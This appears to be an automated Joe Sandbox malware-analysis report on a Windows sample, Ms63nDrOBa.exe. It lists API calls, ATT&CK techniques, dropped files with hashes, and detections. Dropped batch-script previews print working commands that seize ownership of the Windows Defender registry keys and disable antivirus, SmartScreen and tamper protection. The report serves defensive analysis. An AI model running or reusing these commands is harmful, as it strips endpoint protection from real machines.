Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF7C1757498
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: GetLocaleInfoW,4_2_00007FF7C1757340
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF7C1757674
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: GetLocaleInfoW,4_2_00007FF7C1757548
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: EnumSystemLocalesW,4_2_00007FF7C175791C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: try_get_function,GetLocaleInfoW,4_2_00007FF7C1757EB0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF7C17570F4
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: EnumSystemLocalesW,4_2_00007FF7C175705C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: EnumSystemLocalesW,4_2_00007FF7C1756F8C
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C171D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C171D304
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe Code function: 4_2_00007FF7C171D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C171D304
Source: C:\Users\user\Desktop\Ms63nDrOBa.exe Code function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\reg.exe Registry value created: SpyNetReportingLocation 0
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Registry value created: DisableAutoExclusions 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser Registry value created: MpEnablePus 0
Source: C:\Windows\SysWOW64\reg.exe Registry value created: TamperProtectionSource 2
Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled Off
Source: C:\Windows\SysWOW64\reg.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter PreventOverride
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts2
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
6
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
Bypass User Account Control
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol2
Browser Session Hijacking
Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter
Logon Script (Windows)1
Access Token Manipulation
1
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares1
Clipboard Data
SteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook12
Process Injection
1
Timestomp
NTDS54
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets131
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Bypass User Account Control
Cached Domain Credentials2
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry
DCSync1
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Virtualization/Sandbox Evasion
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Behavior Graph ID: 1472092. Sample: Ms63nDrOBa.exe. Start date: 12/07/2024. Architecture: WINDOWS. Score: 96.

  • Start: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Machine Learning detection for sample; 2 other signatures
  • Ms63nDrOBa.exe started. Dropped: C:\Users\user\...\win_version_csharp.exe (PE32), C:\Users\user\AppData\Local\...\uxdabweej.exe (PE32), C:\Users\user\AppData\Local\...\nsExec.dll (PE32), 3 other malicious files. Started: cmd.exe, cmd.exe
  • cmd.exe (first): Uses cmd line tools excessively to alter registry or file data. Started: reg.exe, reg.exe, reg.exe, 35 other processes
  • cmd.exe (second) started: conhost.exe, SetACL64.exe
  • reg.exe: Adds extensions / path to Windows Defender exclusion list (Registry); Disable Windows Defender real time protection (registry)
  • reg.exe: Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
  • reg.exe: Disables Windows Defender Tamper protection
  • 35 other processes: Disables the phising filter of Microsoft Edge; Disables the Smart Screen filter

Source | Detection | Scanner | Label
Ms63nDrOBa.exe | 29% | ReversingLabs | Win32.Trojan.Generic
Ms63nDrOBa.exe | 34% | Virustotal |
Ms63nDrOBa.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe | 21% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe | 19% | Virustotal |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe | 5% | Virustotal |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exe | 1% | Virustotal |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
https://helgeklein.com. | 0% | Avira URL Cloud | safe
https://helgeklein.com | 0% | Avira URL Cloud | safe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe | 0% | Avira URL Cloud | safe
https://helgeklein.com. | 0% | Virustotal |
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe | 0% | Virustotal |
https://helgeklein.com | 0% | Virustotal |
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_ErrorError | Ms63nDrOBa.exe | false | URL Reputation: safe | unknown
https://helgeklein.com. | SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://helgeklein.com | SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe | SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
No contacted IP infos
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1472092
Start date and time:2024-07-12 09:52:20 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 28s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:44
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Ms63nDrOBa.exe
renamed because original name is a hash value
Original Sample Name:ad3a57927668a9560b5f01d7ff54c881.exe
Detection:MAL
Classification:mal96.phis.evad.winEXE@149/9@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 75
  • Number of non-executed functions: 145
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 40.127.169.103, 13.85.23.206, 2.16.100.168, 88.221.110.91
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
No simulations
No context
No context
No context
No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe | file.exe | malicious | Unknown
  | Ptmhbplhxb.exe | malicious | Unknown
  | P196hUN2fw.exe | malicious | Unknown
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll | SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | malicious | Unknown
  | SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe | malicious | Unknown
  | rSCAN31804.exe | malicious | GuLoader, Remcos
  | rSCAN31804.exe | malicious | GuLoader
  | SCAN00381638.SCR.exe | malicious | GuLoader, Remcos
  | SCAN00381638.SCR.exe | malicious | GuLoader
  | setup#U67e5#U770b.exe | malicious | Unknown
  | BxBT7a2sCE.exe | malicious | GuLoader
  | f1vPbtLjJn.exe | malicious | GuLoader
  | PO 345504521#.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe | Ptmhbplhxb.exe | malicious | Unknown
  | P196hUN2fw.exe | malicious | Unknown
  | e4.exe | malicious | RedLine
  | 2dOeahdsto.exe | malicious | Xmrig
  | bQQHP9ciRL.exe | malicious | Xmrig
  | DllHost.exe | malicious | Xmrig
  | Fza7TPh6Z7.exe | malicious | Unknown
  | SAlxtNmHFR.exe | malicious | RedLine Xmrig
  | BFSdrqaAvS.exe | malicious | Amadey RedLine
  | We7WnoqeXe.exe | malicious | Amadey RedLine
Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:dropped
Size (bytes):15086
Entropy (8bit):5.150938541565102
Encrypted:false
SSDEEP:192:Vv17chSvlS4dPrKujOlq5FnyPPc6gO7Dm:Vv1RzrKT0Gha
MD5:49B98E639F4227764354822911E202AF
SHA1:B331473E67138A81FB4B445AF28217E2F814D167
SHA-256:036EA9ACF3E8F9E58A83A1D2BCB1F0C756EF3C2A8671EC1CB527A6ED2CC91DD9
SHA-512:5EAEB99EFD005F103FAD5550EB0B5731D7B2A49463C82F81B81BC282E6B905008E037F11671E57ECEC1A6791E9EB0D65A7EFA92994B6285ED4E4E8C79FE3D761
Malicious:false
Preview:............ .h...6... .... .........00.... ..%..F...(....... ..... .......................................................H@.........................sb.........//0F112.556.;;<.CCD.JKK.[]R............................>7......122z788.=>>.BDD.GII.KMM.OPP.....................................011z566.:;;.@AA.DEE.HII.IKK.llG.................................-..z233.788.<==.@AA.CDD.DEE.DEE.TMR.zaa.y_U.oXN.dPN.gLK..lvP....+,,z/00.344.788.=>>.?@@.>??.?@@.FGG.;<<.788.344./00.$$$.........())z,--./00.344.JJJ.EFF.8::.@@@.JJJ.TUU.233./00.+,,.!!".........%&&z()).+,,.-//.GHH.RSS.?@@.>??.bbb.899..//.+,,.())............."##z%&&.'((.)**.IJJ.QRR.hhh.QQQ.eee.mmm.,--.'((.$%%.............!!!z"##.#$$.%&&.LLL.eff.....BCC.,--./00.'((.#$$."##............. !!z!""."##."##.'((.344.-...$%%.#$$.#$$."##."##.!"".............!""z!""."##."##.!""."##."##."##."##."##."##."##.!"".............!!"z!"".!"".!""."##."##.!""."""."##.!"".!"".!"".!"".............!""z!""."##.!"".""".!"".!"".!"".!"".!"".""".!""."##.............***B)*
Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
                                                Size (bytes):945944
                                                Entropy (8bit):6.654096172451499
                                                Encrypted:false
                                                SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                MD5:EFE5769E37BA37CF4607CB9918639932
                                                SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                                SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                • Antivirus: Virustotal, Detection: 19%
                                                Joe Sandbox View:
                                                • Filename: Ptmhbplhxb.exe, Detection: malicious
                                                • Filename: P196hUN2fw.exe, Detection: malicious
                                                • Filename: e4.exe, Detection: malicious
                                                • Filename: 2dOeahdsto.exe, Detection: malicious
                                                • Filename: bQQHP9ciRL.exe, Detection: malicious
                                                • Filename: DllHost.exe, Detection: malicious
                                                • Filename: Fza7TPh6Z7.exe, Detection: malicious
                                                • Filename: SAlxtNmHFR.exe, Detection: malicious
                                                • Filename: BFSdrqaAvS.exe, Detection: malicious
                                                • Filename: We7WnoqeXe.exe, Detection: malicious
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):616312
                                                Entropy (8bit):6.302197712270286
                                                Encrypted:false
                                                SSDEEP:12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
                                                MD5:1FB64FF73938F4A04E97E5E7BF3D618C
                                                SHA1:AA0F7DB484D0C580533DEC0E9964A59588C3632B
                                                SHA-256:4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
                                                SHA-512:DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious
                                                • Filename: Ptmhbplhxb.exe, Detection: malicious
                                                • Filename: P196hUN2fw.exe, Detection: malicious
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):158
                                                Entropy (8bit):4.80690240808071
                                                Encrypted:false
                                                SSDEEP:3:tMwDDbRx8iF/Q+VVyXCQyKbup/qNyfrZfyM1KJA7XFhtAG5cF2IJVkBf3GId:pnIm/HVsXZlm/ZH18A7XFhtF5c0IJOBv
                                                MD5:CD22CAEA1D452F4AE5E9DCD3F41741CD
                                                SHA1:A316865317B46ECED16BD67B4FFAF7B9740CFAAE
                                                SHA-256:9AB6A3D57D266265EBA1E12C0A12F9ACF2EE0317EFF89D608486E6E46A229D7F
                                                SHA-512:522AD25F2FDE1F66EDC9944B3029A87A09C1F3F2AA9C4510A01015394542136A6DB9E3C69632C24F15893359483638BC2E6329343E7865E71606C1FDD9D394EC
                                                Malicious:false
                                                Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"..
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12658
                                                Entropy (8bit):5.1902260402180405
                                                Encrypted:false
                                                SSDEEP:192:OBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:vK
                                                MD5:4F452A4396042213CF675A0A9EA03643
                                                SHA1:F46F8B37112F04DAEF0C5408D5AACF076EEB4B52
                                                SHA-256:EE79BB638FDE456E18195A6A5882616B9A6E9390965CB3365AE6873E92F6F090
                                                SHA-512:CC501309C5E946E6F157E3A14D0048B929852CE6C4C1ED910ACC7E37E8BDCB77475B5411B2372410D2827F5CE08D1FF8D2301A949385A5550514EF7E9B8B6F0F
                                                Malicious:false
                                                Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full".. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1"
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):7168
                                                Entropy (8bit):5.2959870663251625
                                                Encrypted:false
                                                SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious
                                                • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious
                                                • Filename: rSCAN31804.exe, Detection: malicious
                                                • Filename: rSCAN31804.exe, Detection: malicious
                                                • Filename: SCAN00381638.SCR.exe, Detection: malicious
                                                • Filename: SCAN00381638.SCR.exe, Detection: malicious
                                                • Filename: setup#U67e5#U770b.exe, Detection: malicious
                                                • Filename: BxBT7a2sCE.exe, Detection: malicious
                                                • Filename: f1vPbtLjJn.exe, Detection: malicious
                                                • Filename: PO 345504521#.exe, Detection: malicious
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):5120
                                                Entropy (8bit):3.8201777744499874
                                                Encrypted:false
                                                SSDEEP:48:6isDgDtjQHbc6akyAnx2mMM4ife1QivkZZtMlDIra569FHpfbNtm:X1JQpjVfeT1+fzNt
